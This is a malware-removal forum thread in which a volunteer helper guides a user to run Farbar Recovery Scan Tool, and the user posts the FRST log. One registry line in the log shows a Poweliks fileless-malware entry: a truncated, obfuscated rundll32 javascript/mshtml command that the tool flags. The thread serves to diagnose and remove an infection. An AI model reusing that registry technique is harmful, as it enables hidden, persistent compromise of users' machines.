
Need help please Framer - inf ....movieroomreviews .... getdata and ot


  • This topic is locked

#1
JUSTME1969

  • Member
  • 32 posts

Hi,

 

I keep getting threat popups. framer-inf.... movieroomreviews ...... getdata and many others after going to a news website yesterday. Can you please help me with this?  


#2
pystryker

  • Trusted Helper
  • Malware Removal
  • 3,886 posts

Hello and welcome to Geeks To Go! My nickname is Pystryker :) , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you:
  • If you are receiving help for this issue at another forum, please let me know so I can close this thread.
  • Please download to and run all requested tools from your Desktop.
  • Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly". This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
  • If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
  • Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
  • This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
  • Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
  • It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you back up any critical personal files on your machine before we start.
  • If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
  • If you are unsure of an instruction I give you, or if something unexpected occurs, do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
  • Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
  • Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future.
  • Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way. :)
Now, let's get started, shall we? :thumbsup:


Hello, let's get a look at your system and see what's going on. :)


Scan with Farbar's Recovery Scan Tool (FRST)


Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Place a check in the box marked Addition.txt

  • Press the Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste the log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST Log

Addition.txt Log

#3
JUSTME1969

  • Topic Starter
  • Member
  • 32 posts

Hi Pystryker :) Thank you very much for helping me...I really appreciate it! I am in the process of DL the Farbar tool and 2 things come up. One is FSS.exe and the other is Farbar..is this supposed to happen?


#4
JUSTME1969

  • Topic Starter
  • Member
  • 32 posts

Also I am having to DL the tool from Google Chrome which does not give me the option to save to desktop. Is there a way to do this that I am unaware of? When I try to DL from IE it tells me that my settings are not right to DL it ...this happens with everything that I try to DL but wasn't happening before the infection. 

 

I clicked on the scan button and after about 30 seconds Farbar window disappeared and there were no logs that popped up. Should I DL again because it is not on my desktop.


Edited by JUSTME1969, 01 January 2015 - 10:35 PM.

#5
pystryker

  • Trusted Helper
  • Malware Removal
  • 3,886 posts

> Hi Pystryker :) Thank you very much for helping me...I really appreciate it! I am in the process of DL the Farbar tool and 2 things come up. One is FSS.exe and the other is Farbar..is this supposed to happen?


Hello, you're quite welcome. :)

Which version do you need to download? The 64 bit or the 32 bit? Clicking on the button will send you to a page as the download starts that has other downloads on it. Then your download will start. Only download the version you need. :thumbsup:

#6
pystryker

  • Trusted Helper
  • Malware Removal
  • 3,886 posts

> Also I am having to DL the tool from Google Chrome which does not give me the option to save to desktop. Is there a way to do this that I am unaware of? When I try to DL from IE it tells me that my settings are not right to DL it ...this happens with everything that I try to DL but wasn't happening before the infection.
>
> I clicked on the scan button and after about 30 seconds Farbar window disappeared and there were no logs that popped up. Should I DL again because it is not on my desktop.

Try these instructions to change where Google Chrome downloads files to. :)



1.) Click the Chrome menu on the browser toolbar.

2.) Select Settings.

3.) Click Show advanced settings and scroll down to the "Downloads" section.

To change the default download location, click Change and select where you'd like your files to be saved.

If you'd rather choose a specific location for each download, select the "Ask where to save each file before downloading" checkbox.

#7
JUSTME1969

  • Topic Starter
  • Member
  • 32 posts

Thank you :) 

 

My PC takes the 32 bit version. I am trying to DL it again ...I found the settings for DL and it did ask where I wanted to Dl it to .. I selected desktop but the DL says FSS.exe is that correct? 


#8
pystryker

  • Trusted Helper
  • Malware Removal
  • 3,886 posts

> Thank you :)
>
> My PC takes the 32 bit version. I am trying to DL it again ...I found the settings for DL and it did ask where I wanted to Dl it to .. I selected desktop but the DL says FSS.exe is that correct?

No, the download will be FRST.exe which is the 32-bit version. :thumbsup:

#9
JUSTME1969

  • Topic Starter
  • Member
  • 32 posts

Ok I think I was finally able to get it DL ... I am about to try and scan again. 


#10
pystryker

  • Trusted Helper
  • Malware Removal
  • 3,886 posts

> Ok I think I was finally able to get it DL ... I am about to try and scan again.


:thumbsup:

#11
JUSTME1969

  • Topic Starter
  • Member
  • 32 posts

Here we go  :thumbsup:  :thumbsup: 

 

FRST txt 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2015
Ran by April (administrator) on APRIL-PC on 02-01-2015 00:07:49
Running from C:\Users\April\Desktop
Loaded Profile: April (Available profiles: April)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(SANDBOXIE L.T.D) C:\Program Files\Sandboxie\SbieSvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Coupons.com Inc.) C:\Program Files\Coupons\CouponPrinterService.exe
(Nero AG) C:\Program Files\Motorola Media Link\Lite\NServiceEntry.exe
(Eastman Kodak Company) C:\Program Files\Kodak\AiO\Center\EKAiOHostService.exe
(Eastman Kodak Company) C:\Program Files\Kodak\AiO\StatusMonitor\EKPrinterSDK.exe
() C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
() C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Eastman Kodak Company) C:\Program Files\Kodak\AiO\StatusMonitor\EKStatusMonitor.exe
(Gadwin Systems, Inc) C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\System32\cmmon32.exe
(Microsoft Corporation) C:\Windows\System32\systray.exe
(Microsoft Corporation) C:\Windows\System32\dpnsvr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\upnpcont.exe
(Microsoft Corporation) C:\Windows\System32\NAPSTAT.EXE
(Microsoft Corporation) C:\Windows\System32\dvdupgrd.exe
(Microsoft Corporation) C:\Windows\System32\dplaysvr.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [] => [X]
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5227112 2014-12-12] (AVAST Software)
HKLM\...\Run: [EKStatusMonitor] => C:\PROGRAM FILES\KODAK\AIO\STATUSMONITOR\EKStatusMonitor.exe [2750840 2013-12-11] (Eastman Kodak Company)
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\Run: [Gadwin PrintScreen] => C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe [487424 2011-05-03] (Gadwin Systems, Inc)
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {6f766fac-5ca7-11e1-ba6a-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {952aea8a-075f-11e3-a52c-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {97b3e8bf-0fa5-11e1-8250-001e33ff5421} - F:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [KodakHomeCenter] => C:\Program Files\Kodak\AiO\Center\AiOHomeCenter.exe [2234064 2014-05-06] (Eastman Kodak Company)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll (AVAST Software)
CHR HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.bing.com/...Box&FORM=IE10SR
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://startpage.com/
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.co...=TSNA&bmod=TSNA
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://www.startpage.com/
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = www.bing.com
SearchScopes: HKLM -> {8930D4D5-7D5F-4D26-8424-B1961D3E6EE0} URL = http://www.google.co...ng}&rlz=1I7TSNA
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> DefaultScope {8930D4D5-7D5F-4D26-8424-B1961D3E6EE0} URL = http://www.google.co...NA_enUS355US356
SearchScopes: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> Comcast URL = http://search.xfinit...art_tech_search
SearchScopes: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> {6C59297E-BFFE-4E6A-0BF5-4187155432D8} URL = http://www.bing.com/...eferrer:source}
SearchScopes: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> {8930D4D5-7D5F-4D26-8424-B1961D3E6EE0} URL = http://www.google.co...NA_enUS355US356
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-0017-0000-0040-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF32_15_0_0_246.dll ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.0.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-692471023-1834078390-643647909-1001: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL No File
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2012-03-07]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com"
CHR Plugin: (Widevine Content Decryption Module) - C:\Users\April\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.2.464\_platform_specific\win_x86\widevinecdmadapter.dll No File
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\39.0.2171.95\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\39.0.2171.95\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\39.0.2171.95\pdf.dll ()
CHR Plugin: (Coupons Inc., Coupon Printer) - C:\Program Files\Google\Chrome\Application\plugins\npMozCouponPrinter.dll (Coupons, Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.550.14) - C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java™ Platform SE 7 U55) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live Photo Gallery) - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Catalina Savings Printer) - C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL No File
CHR Plugin: (Shockwave for Director) - C:\windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
CHR Plugin: (Shockwave Flash) - C:\windows\system32\Macromed\Flash\NPSWF32.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll No File
CHR Profile: C:\Users\April\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-22]
CHR Extension: (YouTube) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-27]
CHR Extension: (Google Search) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-27]
CHR Extension: (Avast Online Security) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-07-22]
CHR Extension: (Google Wallet) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-26]
CHR Extension: (Gmail) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-27]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-12-02]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-12-02] (AVAST Software)
R2 cfWiMAXService; C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [185712 2009-08-10] (TOSHIBA CORPORATION)
R2 ConfigFree Service; C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe [46448 2009-03-10] (TOSHIBA CORPORATION)
R2 CouponPrinterService; C:\Program Files\Coupons\CouponPrinterService.exe [152560 2014-02-13] (Coupons.com Inc.)
R2 DeviceMonitorService; C:\Program Files\Motorola Media Link\Lite\NServiceEntry.exe [87368 2011-09-19] (Nero AG)
S3 GameConsoleService; C:\Program Files\TOSHIBA Games\TOSHIBA Game Console\GameConsoleService.exe [250616 2009-05-22] (WildTangent, Inc.)
R2 Kodak AiO Network Discovery Service; C:\Program Files\Kodak\AiO\Center\EKAiOHostService.exe [395640 2014-05-06] (Eastman Kodak Company)
R2 Kodak AiO Status Monitor Service; C:\Program Files\Kodak\AiO\StatusMonitor\EKPrinterSDK.exe [780152 2013-12-11] (Eastman Kodak Company)
R2 MotoHelper; C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe [214896 2011-12-06] ()
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [72936 2011-03-24] (SANDBOXIE L.T.D)
S3 TMachInfo; C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [54136 2011-02-11] (TOSHIBA Corporation)
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [185712 2009-08-11] (TOSHIBA Corporation)
S3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [111960 2009-09-17] (TOSHIBA Corporation)
S3 TPCHSrv; C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe [685424 2009-08-06] (TOSHIBA Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 aswHwid; C:\windows\system32\drivers\aswHwid.sys [24184 2014-12-02] ()
R2 aswMonFlt; C:\windows\system32\drivers\aswMonFlt.sys [70384 2014-12-02] (AVAST Software)
R1 aswRdr; C:\windows\system32\drivers\aswRdr2.sys [81768 2014-12-02] (AVAST Software)
R0 aswRvrt; C:\windows\system32\Drivers\aswRvrt.sys [49944 2014-12-02] ()
R1 aswSnx; C:\windows\system32\drivers\aswSnx.sys [787800 2014-12-02] (AVAST Software)
R1 aswSP; C:\windows\system32\drivers\aswSP.sys [423784 2014-12-02] (AVAST Software)
R2 aswStm; C:\windows\system32\drivers\aswStm.sys [91496 2014-12-02] (AVAST Software)
R0 aswVmm; C:\windows\system32\Drivers\aswVmm.sys [206248 2014-12-02] ()
R3 PGEffect; C:\windows\System32\DRIVERS\pgeffect.sys [24064 2009-06-22] (TOSHIBA Corporation)
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [126696 2011-03-24] (SANDBOXIE L.T.D)
R2 TVALZFL; C:\windows\System32\DRIVERS\TVALZFL.sys [12920 2009-06-19] (TOSHIBA Corporation)
S3 USBAAPL; C:\windows\System32\Drivers\usbaapl.sys [43520 2012-02-15] (Apple, Inc.) [File not signed]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-01-02 00:07 - 2015-01-02 00:11 - 00019140 _____ () C:\Users\April\Desktop\FRST.txt
2015-01-02 00:03 - 2015-01-02 00:04 - 01114624 _____ (Farbar) C:\Users\April\Desktop\FRST.exe
2015-01-01 23:55 - 2015-01-01 23:55 - 00415232 _____ (Farbar) C:\Users\April\Desktop\FSS.exe
2015-01-01 23:29 - 2015-01-02 00:08 - 00000000 ____D () C:\FRST
2015-01-01 23:00 - 2015-01-01 23:00 - 00415232 _____ (Farbar) C:\Users\April\Downloads\FSS.exe
2015-01-01 22:59 - 2015-01-01 23:00 - 01114624 _____ (Farbar) C:\Users\April\Downloads\FRST.exe
2015-01-01 22:52 - 2015-01-01 22:52 - 00000000 ____D () C:\Users\April\Desktop\OTHER
2015-01-01 22:41 - 2015-01-01 22:41 - 00000000 ____D () C:\Users\April\AppData\Local\{70746551-F9E7-4351-B1CC-D8BDBFA7CB6B}
2015-01-01 14:50 - 2015-01-01 14:51 - 02433253 _____ (MightyUninstaller.com ) C:\Users\April\Downloads\MightyUninstaller_Setup.exe
2015-01-01 14:46 - 2015-01-01 14:46 - 00000000 ____D () C:\Users\April\AppData\Local\{9BF9220E-F428-4080-9544-AC03B2A75DE2}
2015-01-01 02:11 - 2015-01-01 02:11 - 355712480 _____ () C:\windows\MEMORY.DMP
2015-01-01 02:11 - 2015-01-01 02:11 - 00145584 _____ () C:\windows\Minidump\010115-19921-01.dmp
2015-01-01 02:11 - 2015-01-01 02:11 - 00000000 ____D () C:\windows\Minidump
2015-01-01 01:18 - 2015-01-01 12:52 - 00000000 ____D () C:\Users\April\Desktop\WT
2015-01-01 01:12 - 2015-01-01 01:13 - 05198336 _____ (AVAST Software) C:\Users\April\Downloads\aswMBR (1).exe
2014-12-31 23:48 - 2015-01-01 00:18 - 00000000 ____D () C:\AdwCleaner
2014-12-31 23:44 - 2014-12-31 23:45 - 02173952 _____ () C:\Users\April\Downloads\adwcleaner_4.106.exe
2014-12-31 23:32 - 2014-12-31 23:33 - 04187592 _____ (Kaspersky Lab ZAO) C:\Users\April\Downloads\tdsskiller.exe
2014-12-31 01:05 - 2014-12-31 01:05 - 00000000 ____D () C:\Users\April\AppData\Local\{0FAFBB6C-829B-4650-B858-4E68BFE72B0D}
2014-12-30 12:29 - 2014-12-30 12:29 - 00000000 ____D () C:\Users\April\AppData\Local\{02E61EBD-EF53-403B-9870-6E9B5C219D0F}
2014-12-30 00:28 - 2014-12-30 00:29 - 00000000 ____D () C:\Users\April\AppData\Local\{1CA1BBA8-99A8-4C98-AF3B-0EAE117CD07A}
2014-12-27 23:00 - 2014-12-27 23:00 - 00000000 ____D () C:\Users\April\AppData\Local\{B7063962-60B2-48AD-A6FD-DC09FC2B2E87}
2014-12-26 15:47 - 2014-12-26 15:47 - 00000000 ____D () C:\Users\April\AppData\Local\{FB72192C-3175-480A-81AF-5F7E58F5F525}
2014-12-20 16:28 - 2014-12-20 16:28 - 00000000 ____D () C:\Users\April\AppData\Local\{2EAEDE4E-F528-4D8F-9921-DCD486ADD7D8}
2014-12-19 01:54 - 2014-12-19 01:55 - 00000000 ____D () C:\Users\April\AppData\Local\{5690EDFD-0153-4F78-A832-FB2962118B0F}
2014-12-18 13:54 - 2014-12-18 13:54 - 00000000 ____D () C:\Users\April\AppData\Local\{D613960E-ECC1-4DE3-B444-E0413A18B055}
2014-12-18 11:49 - 2014-12-12 22:33 - 00115712 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-12-18 01:18 - 2014-12-18 01:18 - 00000000 ____D () C:\Users\April\AppData\Local\{D64BEC6F-F2E8-4E31-99BA-35036080796D}
2014-12-17 10:18 - 2014-12-17 10:18 - 00000000 ____D () C:\Users\April\AppData\Local\{FF751368-68AB-4B92-8D45-34F03DBD3B18}
